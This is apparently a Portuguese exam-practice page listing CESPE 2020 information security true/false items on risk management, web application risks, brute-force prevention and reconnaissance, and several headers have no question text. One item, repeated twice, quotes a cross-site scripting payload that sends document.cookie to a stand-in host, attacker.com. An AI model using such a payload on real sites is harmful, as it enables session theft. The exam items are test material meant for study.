Lista completa de Questões de Segurança da Informação do ano 2020 para resolução totalmente grátis. Selecione os assuntos no filtro de questões e comece a resolver exercícios.
Segurança da Informação - Análise de Vulnerabilidade e Gestão de Riscos - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Julgue o próximo item, a respeito de gerência de riscos.
Para gerenciar riscos, devem-se considerar os contextos externo e interno da organização, salvo o comportamento humano.
Segurança da Informação - Políticas de Segurança de Informação - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Segurança da Informação - Segurança de sistemas de informação - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Segurança da Informação - Políticas de Segurança de Informação - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Segurança da Informação - Políticas de Segurança de Informação - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Segurança da Informação - Noções de Segurança - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Segurança da Informação - Segurança na Internet - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Segurança da Informação - Segurança física e lógica - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.
Segurança da Informação - Segurança física e lógica - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.
Segurança da Informação - Firewall em Segurança da Informação - Centro de Seleção e de Promoção de Eventos UnB (CESPE) - 2020
Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.
Fingerprint é a fase do footprint que tem por objetivo a identificação do endereço IP do host alvo.
{TITLE}
{CONTENT}
{TITLE}
Aguarde, enviando solicitação...